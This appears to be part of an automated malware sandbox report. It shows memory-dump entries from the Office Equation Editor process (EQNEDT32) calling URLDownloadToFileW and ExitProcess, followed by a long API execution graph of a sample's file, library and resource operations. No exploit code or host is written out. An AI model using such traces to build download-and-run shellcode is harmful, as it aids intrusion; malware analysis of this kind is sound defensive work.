                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 2a29999f516f4265654bf4ba96437bc394bd20367927042e726513b9c637b6c0
                            • Instruction ID: 0e2f49ce4a7edaf3ac9460c6d96e845b4d17d5dbf6a0ff0ab8972b6a493411f4
                            • Opcode Fuzzy Hash: 2a29999f516f4265654bf4ba96437bc394bd20367927042e726513b9c637b6c0
                            • Instruction Fuzzy Hash: 7341AEA544D3C62FC722D770AD2A665BF247B93511F0CCA8E95D50B1F3A3A4A2059352

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction ID: e20f3774e0318cf870b816079b27584707fbd10fe5328dbe51ba67a77370921a
                            • Opcode Fuzzy Hash: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction Fuzzy Hash: 4311AFA084C3C22FC722D770AC6AB55BF647BA2610F1CCACE96D50F1E3E3A591019752

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction ID: 5279f4de2a71d999a372d26c535c100bfb53933d33cc84a54f8962db0a974139
                            • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction Fuzzy Hash: 94116FF090D3427AC760E654E871BBAFBA1BBF2720F58C55AE5504F0F5E3A0E542C219

                            Control-flow Graph

                            APIs
                            • ExitProcess.KERNELBASE(00000000), ref: 03560565
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction Fuzzy Hash:

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction ID: 3b71189967319153c3b7bd3ba86c2be8051481b30d5539eb49684a3b622bbc97
                            • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction Fuzzy Hash: 5DD052B12025029FC304DF04D990E22F37AFFE8260B28C268E4044B769D730E892CB90

                            Control-flow Graph

                            APIs
                            • ExitProcess.KERNELBASE(035603BD), ref: 035603CF
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: bedebe269a70294558d653869ad26599dbae31bf343a58e7048c1f80490712e0
                            • Instruction ID: bb633ee72060a364036828a052251c305007c987ed68d66fa78e9a0baf4b1980
                            • Opcode Fuzzy Hash: bedebe269a70294558d653869ad26599dbae31bf343a58e7048c1f80490712e0
                            • Instruction Fuzzy Hash: 0A11005580E7C55FC322D7706E6A065BF60B95310270D8ACFC0C50B1F3E2A8D646D352

                            Execution Graph

                            Execution Coverage:3.8%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:6.2%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:184
104887 d9874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104629->104887 104789 d43a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104630->104789 104633 d7d2cf 104633->104630 104636 d7d2e0 104633->104636 104888 d44706 104636->104888 104637 d43c30 104639 d43c43 104637->104639 104797 d4434a 104637->104797 104808 d509d0 104639->104808 104645->104617 104659->104598 104660->104603 104661->104605 104915 d60db6 104662->104915 104664 d47688 104665 d60db6 Mailbox 60 API calls 104664->104665 104666 d43b51 GetCurrentDirectoryW 104665->104666 104667 d43766 104666->104667 104668 d47667 60 API calls 104667->104668 104669 d4377c 104668->104669 104953 d43d31 104669->104953 104671 d4379a 104672 d44706 62 API calls 104671->104672 104673 d437ae 104672->104673 104674 d47de1 60 API calls 104673->104674 104675 d437bb 104674->104675 104967 d44ddd 104675->104967 104678 d7d173 105038 da955b 104678->105038 104679 d437dc Mailbox 104991 d48047 104679->104991 104683 d7d192 104685 d62d55 _free 59 API calls 104683->104685 104687 d7d19f 104685->104687 104689 d44e4a 85 API calls 104687->104689 104691 d7d1a8 104689->104691 104695 d43ed0 60 API calls 104691->104695 104692 d47de1 60 API calls 104693 d43808 104692->104693 104998 d484c0 104693->104998 104697 d7d1c3 104695->104697 104696 d4381a Mailbox 104698 d47de1 60 API calls 104696->104698 104699 d43ed0 60 API calls 104697->104699 104700 d43840 104698->104700 104702 d7d1df 104699->104702 104701 d484c0 70 API calls 104700->104701 104705 d4384f Mailbox 104701->104705 104703 d44706 62 API calls 104702->104703 104704 d7d204 104703->104704 104706 d43ed0 60 API calls 104704->104706 104708 d47667 60 API calls 104705->104708 104707 d7d210 104706->104707 104709 d48047 60 API calls 104707->104709 104710 d4386d 104708->104710 104711 d7d21e 104709->104711 105002 d43ed0 104710->105002 104713 d43ed0 60 API calls 104711->104713 104715 d7d22d 104713->104715 104721 d48047 60 API calls 104715->104721 104717 d43887 104717->104691 104718 d43891 
104717->104718 104719 d62efd _W_store_winword 61 API calls 104718->104719 104720 d4389c 104719->104720 104720->104697 104722 d438a6 104720->104722 104724 d7d24f 104721->104724 104723 d62efd _W_store_winword 61 API calls 104722->104723 104726 d438b1 104723->104726 104725 d43ed0 60 API calls 104724->104725 104727 d7d25c 104725->104727 104726->104702 104728 d438bb 104726->104728 104727->104727 104729 d62efd _W_store_winword 61 API calls 104728->104729 104730 d438c6 104729->104730 104730->104715 104731 d43907 104730->104731 104733 d43ed0 60 API calls 104730->104733 104731->104715 104732 d43914 104731->104732 105018 d492ce 104732->105018 104734 d438ea 104733->104734 104737 d48047 60 API calls 104734->104737 104739 d438f8 104737->104739 104741 d43ed0 60 API calls 104739->104741 104741->104731 104743 d4928a 60 API calls 104745 d4394f 104743->104745 104744 d48ee0 61 API calls 104744->104745 104745->104743 104745->104744 104746 d43ed0 60 API calls 104745->104746 104747 d43995 Mailbox 104745->104747 104746->104745 104747->104612 104749 d47292 __ftell_nolock 104748->104749 104750 d7ea22 _memset 104749->104750 104751 d472ab 104749->104751 104754 d7ea3e GetOpenFileNameW 104750->104754 105932 d44750 104751->105932 104756 d7ea8d 104754->104756 104758 d47bcc 60 API calls 104756->104758 104759 d7eaa2 104758->104759 104759->104759 104761 d472c9 105960 d4686a 104761->105960 104765 d47c45 104764->104765 104766 d47bd8 __wsetenvp 104764->104766 104767 d47d2c 60 API calls 104765->104767 104768 d47c13 104766->104768 104769 d47bee 104766->104769 104772 d47bf6 _memmove 104767->104772 104771 d48029 60 API calls 104768->104771 106279 d47f27 60 API calls Mailbox 104769->106279 104771->104772 104772->104625 104774 d5093a __ftell_nolock 104773->104774 106280 d46d80 104774->106280 104776 d5093f 104788 d43c14 104776->104788 106291 d5119e 90 API calls 104776->106291 104778 d5094c 104778->104788 106292 d53ee7 92 API calls Mailbox 104778->106292 104780 d50955 104781 d50959 GetFullPathNameW 
104780->104781 104780->104788 104782 d47bcc 60 API calls 104781->104782 104783 d50985 104782->104783 104784 d47bcc 60 API calls 104783->104784 104785 d50992 104784->104785 104786 d84cab _wcscat 104785->104786 104787 d47bcc 60 API calls 104785->104787 104787->104788 104788->104621 104788->104629 104790 d43ab0 LoadImageW RegisterClassExW 104789->104790 104791 d7d261 104789->104791 106334 d43041 7 API calls 104790->106334 106335 d447a0 LoadImageW EnumResourceNamesW 104791->106335 104794 d43b34 104796 d439d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104794->104796 104795 d7d26a 104796->104637 104798 d44375 _memset 104797->104798 106336 d44182 104798->106336 104809 d84cc3 104808->104809 104823 d509f5 104808->104823 106426 da9e4a 90 API calls 4 library calls 104809->106426 104851 d50a05 Mailbox 104823->104851 104886->104621 104887->104633 104889 d71940 __ftell_nolock 104888->104889 104890 d44713 GetModuleFileNameW 104889->104890 104891 d47de1 60 API calls 104890->104891 104892 d44739 104891->104892 104893 d44750 61 API calls 104892->104893 104894 d44743 Mailbox 104893->104894 104917 d60dbe 104915->104917 104918 d60dd8 104917->104918 104920 d60ddc std::exception::exception 104917->104920 104925 d6571c 104917->104925 104942 d633a1 DecodePointer 104917->104942 104918->104664 104943 d6859b RaiseException 104920->104943 104922 d60e06 104944 d684d1 59 API calls _free 104922->104944 104924 d60e18 104924->104664 104926 d65797 104925->104926 104933 d65728 104925->104933 104951 d633a1 DecodePointer 104926->104951 104928 d6579d 104952 d68b28 59 API calls __getptd_noexit 104928->104952 104931 d6575b RtlAllocateHeap 104931->104933 104941 d6578f 104931->104941 104933->104931 104934 d65783 104933->104934 104938 d65781 104933->104938 104939 d65733 104933->104939 104948 d633a1 DecodePointer 104933->104948 104949 d68b28 59 API calls __getptd_noexit 104934->104949 104950 d68b28 59 API calls __getptd_noexit 104938->104950 104939->104933 104945 d6a16b 59 API calls __NMSG_WRITE 
104939->104945 104946 d6a1c8 59 API calls 7 library calls 104939->104946 104947 d6309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104939->104947 104941->104917 104942->104917 104943->104922 104944->104924 104945->104939 104946->104939 104948->104933 104949->104938 104950->104941 104951->104928 104952->104941 104954 d43d3e __ftell_nolock 104953->104954 104955 d47bcc 60 API calls 104954->104955 104957 d43ea4 Mailbox 104954->104957 104958 d43d70 104955->104958 104957->104671 104966 d43da6 Mailbox 104958->104966 105079 d479f2 104958->105079 104959 d479f2 60 API calls 104959->104966 104960 d43e77 104960->104957 104961 d47de1 60 API calls 104960->104961 104962 d43e98 104961->104962 104964 d43f74 60 API calls 104962->104964 104963 d47de1 60 API calls 104963->104966 104964->104957 104966->104957 104966->104959 104966->104960 104966->104963 105082 d43f74 104966->105082 105092 d44bb5 104967->105092 104972 d7d8e6 104975 d44e4a 85 API calls 104972->104975 104973 d44e08 LoadLibraryExW 105102 d44b6a 104973->105102 104977 d7d8ed 104975->104977 104979 d44b6a 3 API calls 104977->104979 104980 d7d8f5 104979->104980 105128 d44f0b 104980->105128 104981 d44e2f 104981->104980 104982 d44e3b 104981->104982 104984 d44e4a 85 API calls 104982->104984 104986 d437d4 104984->104986 104986->104678 104986->104679 104988 d7d91c 105136 d44ec7 104988->105136 104990 d7d929 104992 d48052 104991->104992 104993 d437ef 104991->104993 105565 d47f77 60 API calls 2 library calls 104992->105565 104995 d4928a 104993->104995 104996 d60db6 Mailbox 60 API calls 104995->104996 104997 d437fb 104996->104997 104997->104692 104999 d484cb 104998->104999 105000 d484f2 104999->105000 105566 d489b3 104999->105566 105000->104696 105003 d43ef3 105002->105003 105004 d43eda 105002->105004 105006 d47bcc 60 API calls 105003->105006 105005 d48047 60 API calls 105004->105005 105007 d43879 105005->105007 105006->105007 105008 d62efd 105007->105008 105009 d62f7e 105008->105009 105010 d62f09 105008->105010 
105594 d62f90 61 API calls 3 library calls 105009->105594 105017 d62f2e 105010->105017 105592 d68b28 59 API calls __getptd_noexit 105010->105592 105013 d62f8b 105013->104717 105014 d62f15 105593 d68db6 9 API calls ___wstrgtold12_l 105014->105593 105016 d62f20 105016->104717 105017->104717 105019 d492d6 105018->105019 105020 d60db6 Mailbox 60 API calls 105019->105020 105022 d492e4 105020->105022 105021 d43924 105024 d49050 105021->105024 105022->105021 105595 d491fc 60 API calls Mailbox 105022->105595 105596 d49160 105024->105596 105026 d60db6 Mailbox 60 API calls 105028 d43932 105026->105028 105027 d4905f 105027->105026 105027->105028 105029 d48ee0 105028->105029 105030 d7f17c 105029->105030 105032 d48ef7 105029->105032 105030->105032 105606 d48bdb 60 API calls Mailbox 105030->105606 105033 d49040 105032->105033 105034 d48ff8 105032->105034 105037 d48fff 105032->105037 105605 d49d3c 61 API calls Mailbox 105033->105605 105036 d60db6 Mailbox 60 API calls 105034->105036 105036->105037 105037->104745 105039 d44ee5 86 API calls 105038->105039 105040 da95ca 105039->105040 105607 da9734 105040->105607 105043 d44f0b 75 API calls 105044 da95f7 105043->105044 105045 d44f0b 75 API calls 105044->105045 105046 da9607 105045->105046 105047 d44f0b 75 API calls 105046->105047 105048 da9622 105047->105048 105049 d44f0b 75 API calls 105048->105049 105050 da963d 105049->105050 105051 d44ee5 86 API calls 105050->105051 105052 da9654 105051->105052 105053 d6571c __malloc_crt 59 API calls 105052->105053 105054 da965b 105053->105054 105055 d6571c __malloc_crt 59 API calls 105054->105055 105056 da9665 105055->105056 105057 d44f0b 75 API calls 105056->105057 105058 da9679 105057->105058 105059 da9109 GetSystemTimeAsFileTime 105058->105059 105060 da968c 105059->105060 105061 da96a1 105060->105061 105062 da96b6 105060->105062 105063 d62d55 _free 59 API calls 105061->105063 105064 da971b 105062->105064 105065 da96bc 105062->105065 105067 da96a7 105063->105067 105066 d62d55 _free 59 API calls 
105064->105066 105613 da8b06 105065->105613 105071 d7d186 105066->105071 105069 d62d55 _free 59 API calls 105067->105069 105069->105071 105071->104683 105073 d44e4a 105071->105073 105072 d62d55 _free 59 API calls 105072->105071 105074 d44e54 105073->105074 105075 d44e5b 105073->105075 105076 d653a6 __fcloseall 84 API calls 105074->105076 105077 d44e6a 105075->105077 105078 d44e7b FreeLibrary 105075->105078 105076->105075 105077->104683 105078->105077 105088 d47e4f 105079->105088 105081 d479fd 105081->104958 105083 d43f82 105082->105083 105087 d43fa4 _memmove 105082->105087 105085 d60db6 Mailbox 60 API calls 105083->105085 105084 d60db6 Mailbox 60 API calls 105086 d43fb8 105084->105086 105085->105087 105086->104966 105087->105084 105089 d47e62 105088->105089 105091 d47e5f _memmove 105088->105091 105090 d60db6 Mailbox 60 API calls 105089->105090 105090->105091 105091->105081 105141 d44c03 105092->105141 105095 d44bdc 105096 d44bf5 105095->105096 105097 d44bec FreeLibrary 105095->105097 105099 d6525b 105096->105099 105097->105096 105098 d44c03 2 API calls 105098->105095 105145 d65270 105099->105145 105101 d44dfc 105101->104972 105101->104973 105302 d44c36 105102->105302 105105 d44b8f 105107 d44ba1 FreeLibrary 105105->105107 105108 d44baa 105105->105108 105106 d44c36 2 API calls 105106->105105 105107->105108 105109 d44c70 105108->105109 105110 d60db6 Mailbox 60 API calls 105109->105110 105111 d44c85 105110->105111 105306 d4522e 105111->105306 105113 d44c91 _memmove 105114 d44ccc 105113->105114 105116 d44dc1 105113->105116 105117 d44d89 105113->105117 105115 d44ec7 70 API calls 105114->105115 105125 d44cd5 105115->105125 105320 da991b 96 API calls 105116->105320 105309 d44e89 CreateStreamOnHGlobal 105117->105309 105120 d44f0b 75 API calls 105120->105125 105122 d44d69 105122->104981 105123 d7d8a7 105124 d44ee5 86 API calls 105123->105124 105126 d7d8bb 105124->105126 105125->105120 105125->105122 105125->105123 105315 d44ee5 105125->105315 105127 d44f0b 75 API calls 
105126->105127 105127->105122 105129 d44f1d 105128->105129 105130 d7d9cd 105128->105130 105344 d655e2 105129->105344 105133 da9109 105542 da8f5f 105133->105542 105135 da911f 105135->104988 105137 d44ed6 105136->105137 105138 d7d990 105136->105138 105547 d65c60 105137->105547 105140 d44ede 105140->104990 105142 d44bd0 105141->105142 105143 d44c0c LoadLibraryA 105141->105143 105142->105095 105142->105098 105143->105142 105144 d44c1d GetProcAddress 105143->105144 105144->105142 105146 d6527c __write 105145->105146 105147 d6528f 105146->105147 105150 d652c0 105146->105150 105194 d68b28 59 API calls __getptd_noexit 105147->105194 105149 d65294 105195 d68db6 9 API calls ___wstrgtold12_l 105149->105195 105164 d704e8 105150->105164 105153 d652c5 105154 d652ce 105153->105154 105155 d652db 105153->105155 105196 d68b28 59 API calls __getptd_noexit 105154->105196 105157 d65305 105155->105157 105158 d652e5 105155->105158 105179 d70607 105157->105179 105197 d68b28 59 API calls __getptd_noexit 105158->105197 105159 d6529f __write @_EH4_CallFilterFunc@8 105159->105101 105165 d704f4 __write 105164->105165 105166 d69c0b __lock 59 API calls 105165->105166 105177 d70502 105166->105177 105167 d70576 105199 d705fe 105167->105199 105168 d7057d 105204 d6881d 59 API calls __malloc_crt 105168->105204 105171 d70584 105171->105167 105173 d69e2b __mtinitlocks 2 API calls 105171->105173 105172 d705f3 __write 105172->105153 105176 d705aa EnterCriticalSection 105173->105176 105174 d69c93 __mtinitlocknum 59 API calls 105174->105177 105176->105167 105177->105167 105177->105168 105177->105174 105202 d66c50 60 API calls __lock 105177->105202 105203 d66cba LeaveCriticalSection LeaveCriticalSection _doexit 105177->105203 105188 d70627 __wopenfile 105179->105188 105180 d70641 105209 d68b28 59 API calls __getptd_noexit 105180->105209 105181 d707fc 105181->105180 105185 d7085f 105181->105185 105183 d70646 105210 d68db6 9 API calls ___wstrgtold12_l 105183->105210 105206 d785a1 105185->105206 105186 d65310 
105198 d65332 LeaveCriticalSection LeaveCriticalSection _fseek 105186->105198 105188->105180 105188->105181 105211 d637cb 61 API calls 2 library calls 105188->105211 105190 d707f5 105190->105181 105212 d637cb 61 API calls 2 library calls 105190->105212 105192 d70814 105192->105181 105213 d637cb 61 API calls 2 library calls 105192->105213 105194->105149 105195->105159 105196->105159 105197->105159 105198->105159 105205 d69d75 LeaveCriticalSection 105199->105205 105201 d70605 105201->105172 105202->105177 105203->105177 105204->105171 105205->105201 105214 d77d85 105206->105214 105208 d785ba 105208->105186 105209->105183 105210->105186 105211->105190 105212->105192 105213->105181 105215 d77d91 __write 105214->105215 105216 d77da7 105215->105216 105219 d77ddd 105215->105219 105299 d68b28 59 API calls __getptd_noexit 105216->105299 105218 d77dac 105300 d68db6 9 API calls ___wstrgtold12_l 105218->105300 105225 d77e4e 105219->105225 105222 d77df9 105301 d77e22 LeaveCriticalSection __unlock_fhandle 105222->105301 105224 d77db6 __write 105224->105208 105226 d77e6e 105225->105226 105227 d644ea __wsopen_nolock 59 API calls 105226->105227 105229 d77e8a 105227->105229 105228 d68dc6 __invoke_watson 8 API calls 105230 d785a0 105228->105230 105231 d77ec4 105229->105231 105239 d77ee7 105229->105239 105298 d77fc1 105229->105298 105232 d77d85 __wsopen_helper 104 API calls 105230->105232 105233 d68af4 __write 59 API calls 105231->105233 105234 d785ba 105232->105234 105235 d77ec9 105233->105235 105234->105222 105236 d68b28 ___wstrgtold12_l 59 API calls 105235->105236 105237 d77ed6 105236->105237 105240 d68db6 ___wstrgtold12_l 9 API calls 105237->105240 105238 d77fa5 105241 d68af4 __write 59 API calls 105238->105241 105239->105238 105247 d77f83 105239->105247 105242 d77ee0 105240->105242 105243 d77faa 105241->105243 105242->105222 105244 d68b28 ___wstrgtold12_l 59 API calls 105243->105244 105245 d77fb7 105244->105245 105246 d68db6 ___wstrgtold12_l 9 API calls 105245->105246 
105246->105298 105248 d6d294 __alloc_osfhnd 62 API calls 105247->105248 105249 d78051 105248->105249 105250 d7807e 105249->105250 105251 d7805b 105249->105251 105253 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105250->105253 105252 d68af4 __write 59 API calls 105251->105252 105254 d78060 105252->105254 105264 d780a0 105253->105264 105255 d68b28 ___wstrgtold12_l 59 API calls 105254->105255 105257 d7806a 105255->105257 105256 d7811e GetFileType 105258 d7816b 105256->105258 105259 d78129 GetLastError 105256->105259 105262 d68b28 ___wstrgtold12_l 59 API calls 105257->105262 105269 d6d52a __set_osfhnd 60 API calls 105258->105269 105263 d68b07 __dosmaperr 59 API calls 105259->105263 105260 d780ec GetLastError 105261 d68b07 __dosmaperr 59 API calls 105260->105261 105265 d78111 105261->105265 105262->105242 105266 d78150 CloseHandle 105263->105266 105264->105256 105264->105260 105267 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105264->105267 105271 d68b28 ___wstrgtold12_l 59 API calls 105265->105271 105266->105265 105270 d7815e 105266->105270 105268 d780e1 105267->105268 105268->105256 105268->105260 105274 d78189 105269->105274 105272 d68b28 ___wstrgtold12_l 59 API calls 105270->105272 105271->105298 105273 d78163 105272->105273 105273->105265 105275 d78344 105274->105275 105276 d718c1 __lseeki64_nolock 61 API calls 105274->105276 105284 d7820a 105274->105284 105277 d78517 CloseHandle 105275->105277 105275->105298 105278 d781f3 105276->105278 105279 d77cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105277->105279 105281 d68af4 __write 59 API calls 105278->105281 105278->105284 105280 d7853e 105279->105280 105282 d78546 GetLastError 105280->105282 105283 d78572 105280->105283 105281->105284 105285 d68b07 __dosmaperr 59 API calls 105282->105285 105283->105298 105284->105275 105286 d7823c 105284->105286 105288 d70e5b 71 API calls __read_nolock 105284->105288 105289 d70add __close_nolock 62 API calls 105284->105289 
105292 d6d886 __write 79 API calls 105284->105292 105293 d783c1 105284->105293 105296 d718c1 61 API calls __lseeki64_nolock 105284->105296 105287 d78552 105285->105287 105286->105284 105290 d797a2 __chsize_nolock 83 API calls 105286->105290 105291 d6d43d __free_osfhnd 60 API calls 105287->105291 105288->105284 105289->105284 105290->105286 105291->105283 105292->105284 105294 d70add __close_nolock 62 API calls 105293->105294 105295 d783c8 105294->105295 105297 d68b28 ___wstrgtold12_l 59 API calls 105295->105297 105296->105284 105297->105298 105298->105228 105299->105218 105300->105224 105301->105224 105303 d44b83 105302->105303 105304 d44c3f LoadLibraryA 105302->105304 105303->105105 105303->105106 105304->105303 105305 d44c50 GetProcAddress 105304->105305 105305->105303 105307 d60db6 Mailbox 60 API calls 105306->105307 105308 d45240 105307->105308 105308->105113 105310 d44ea3 FindResourceExW 105309->105310 105314 d44ec0 105309->105314 105311 d7d933 LoadResource 105310->105311 105310->105314 105312 d7d948 SizeofResource 105311->105312 105311->105314 105313 d7d95c LockResource 105312->105313 105312->105314 105313->105314 105314->105114 105316 d44ef4 105315->105316 105317 d7d9ab 105315->105317 105321 d6584d 105316->105321 105319 d44f02 105319->105125 105320->105114 105324 d65859 __write 105321->105324 105322 d6586b 105334 d68b28 59 API calls __getptd_noexit 105322->105334 105324->105322 105325 d65891 105324->105325 105336 d66c11 105325->105336 105326 d65870 105335 d68db6 9 API calls ___wstrgtold12_l 105326->105335 105329 d65897 105342 d657be 84 API calls 5 library calls 105329->105342 105331 d658a6 105343 d658c8 LeaveCriticalSection LeaveCriticalSection _fseek 105331->105343 105333 d6587b __write 105333->105319 105334->105326 105335->105333 105337 d66c43 EnterCriticalSection 105336->105337 105338 d66c21 105336->105338 105340 d66c39 105337->105340 105338->105337 105339 d66c29 105338->105339 105341 d69c0b __lock 59 API calls 105339->105341 105340->105329 105341->105340 
105342->105331 105343->105333 105347 d655fd 105344->105347 105346 d44f2e 105346->105133 105348 d65609 __write 105347->105348 105349 d6564c 105348->105349 105351 d65644 __write 105348->105351 105353 d6561f _memset 105348->105353 105350 d66c11 __lock_file 60 API calls 105349->105350 105352 d65652 105350->105352 105351->105346 105360 d6541d 105352->105360 105374 d68b28 59 API calls __getptd_noexit 105353->105374 105356 d65639 105375 d68db6 9 API calls ___wstrgtold12_l 105356->105375 105364 d65438 _memset 105360->105364 105366 d65453 105360->105366 105361 d65443 105472 d68b28 59 API calls __getptd_noexit 105361->105472 105363 d65448 105473 d68db6 9 API calls ___wstrgtold12_l 105363->105473 105364->105361 105364->105366 105369 d65493 105364->105369 105376 d65686 LeaveCriticalSection LeaveCriticalSection _fseek 105366->105376 105368 d655a4 _memset 105475 d68b28 59 API calls __getptd_noexit 105368->105475 105369->105366 105369->105368 105377 d646e6 105369->105377 105384 d70e5b 105369->105384 105452 d70ba7 105369->105452 105474 d70cc8 59 API calls 3 library calls 105369->105474 105374->105356 105375->105351 105376->105351 105378 d64705 105377->105378 105379 d646f0 105377->105379 105378->105369 105476 d68b28 59 API calls __getptd_noexit 105379->105476 105381 d646f5 105477 d68db6 9 API calls ___wstrgtold12_l 105381->105477 105383 d64700 105383->105369 105385 d70e93 105384->105385 105386 d70e7c 105384->105386 105387 d715cb 105385->105387 105391 d70ecd 105385->105391 105487 d68af4 59 API calls __getptd_noexit 105386->105487 105503 d68af4 59 API calls __getptd_noexit 105387->105503 105390 d70e81 105488 d68b28 59 API calls __getptd_noexit 105390->105488 105394 d70ed5 105391->105394 105401 d70eec 105391->105401 105392 d715d0 105504 d68b28 59 API calls __getptd_noexit 105392->105504 105489 d68af4 59 API calls __getptd_noexit 105394->105489 105397 d70ee1 105505 d68db6 9 API calls ___wstrgtold12_l 105397->105505 105398 d70eda 105490 d68b28 59 API calls __getptd_noexit 105398->105490 
105400 d70f01 105491 d68af4 59 API calls __getptd_noexit 105400->105491 105401->105400 105402 d70f1b 105401->105402 105405 d70f39 105401->105405 105432 d70e88 105401->105432 105402->105400 105407 d70f26 105402->105407 105492 d6881d 59 API calls __malloc_crt 105405->105492 105478 d75c6b 105407->105478 105408 d70f49 105410 d70f51 105408->105410 105411 d70f6c 105408->105411 105493 d68b28 59 API calls __getptd_noexit 105410->105493 105495 d718c1 61 API calls 3 library calls 105411->105495 105412 d7103a 105415 d710b3 ReadFile 105412->105415 105416 d71050 GetConsoleMode 105412->105416 105418 d710d5 105415->105418 105419 d71593 GetLastError 105415->105419 105420 d71064 105416->105420 105421 d710b0 105416->105421 105417 d70f56 105494 d68af4 59 API calls __getptd_noexit 105417->105494 105418->105419 105426 d710a5 105418->105426 105423 d71093 105419->105423 105424 d715a0 105419->105424 105420->105421 105425 d7106a ReadConsoleW 105420->105425 105421->105415 105437 d71099 105423->105437 105496 d68b07 59 API calls 3 library calls 105423->105496 105501 d68b28 59 API calls __getptd_noexit 105424->105501 105425->105426 105428 d7108d GetLastError 105425->105428 105434 d7110a 105426->105434 105435 d71377 105426->105435 105426->105437 105428->105423 105430 d715a5 105502 d68af4 59 API calls __getptd_noexit 105430->105502 105432->105369 105433 d62d55 _free 59 API calls 105433->105432 105436 d711f7 105434->105436 105439 d71176 ReadFile 105434->105439 105435->105437 105440 d7147d ReadFile 105435->105440 105436->105437 105442 d712b4 105436->105442 105443 d712a4 105436->105443 105446 d71264 MultiByteToWideChar 105436->105446 105437->105432 105437->105433 105441 d71197 GetLastError 105439->105441 105450 d711a1 105439->105450 105445 d714a0 GetLastError 105440->105445 105451 d714ae 105440->105451 105441->105450 105442->105446 105499 d718c1 61 API calls 3 library calls 105442->105499 105498 d68b28 59 API calls __getptd_noexit 105443->105498 105445->105451 105446->105428 105446->105437 
105450->105434 105497 d718c1 61 API calls 3 library calls 105450->105497 105451->105435 105500 d718c1 61 API calls 3 library calls 105451->105500 105453 d70bb2 105452->105453 105456 d70bc7 105452->105456 105539 d68b28 59 API calls __getptd_noexit 105453->105539 105455 d70bb7 105540 d68db6 9 API calls ___wstrgtold12_l 105455->105540 105458 d70bfc 105456->105458 105464 d70bc2 105456->105464 105541 d75fe4 59 API calls __malloc_crt 105456->105541 105460 d646e6 __fclose_nolock 59 API calls 105458->105460 105461 d70c10 105460->105461 105506 d70d47 105461->105506 105463 d70c17 105463->105464 105465 d646e6 __fclose_nolock 59 API calls 105463->105465 105464->105369 105466 d70c3a 105465->105466 105466->105464 105467 d646e6 __fclose_nolock 59 API calls 105466->105467 105468 d70c46 105467->105468 105468->105464 105469 d646e6 __fclose_nolock 59 API calls 105468->105469 105470 d70c53 105469->105470 105471 d646e6 __fclose_nolock 59 API calls 105470->105471 105471->105464 105472->105363 105473->105366 105474->105369 105475->105363 105476->105381 105477->105383 105479 d75c76 105478->105479 105481 d75c83 105478->105481 105480 d68b28 ___wstrgtold12_l 59 API calls 105479->105480 105482 d75c7b 105480->105482 105483 d75c8f 105481->105483 105484 d68b28 ___wstrgtold12_l 59 API calls 105481->105484 105482->105412 105483->105412 105485 d75cb0 105484->105485 105486 d68db6 ___wstrgtold12_l 9 API calls 105485->105486 105486->105482 105487->105390 105488->105432 105489->105398 105490->105397 105491->105398 105492->105408 105493->105417 105494->105432 105495->105407 105496->105437 105497->105450 105498->105437 105499->105446 105500->105451 105501->105430 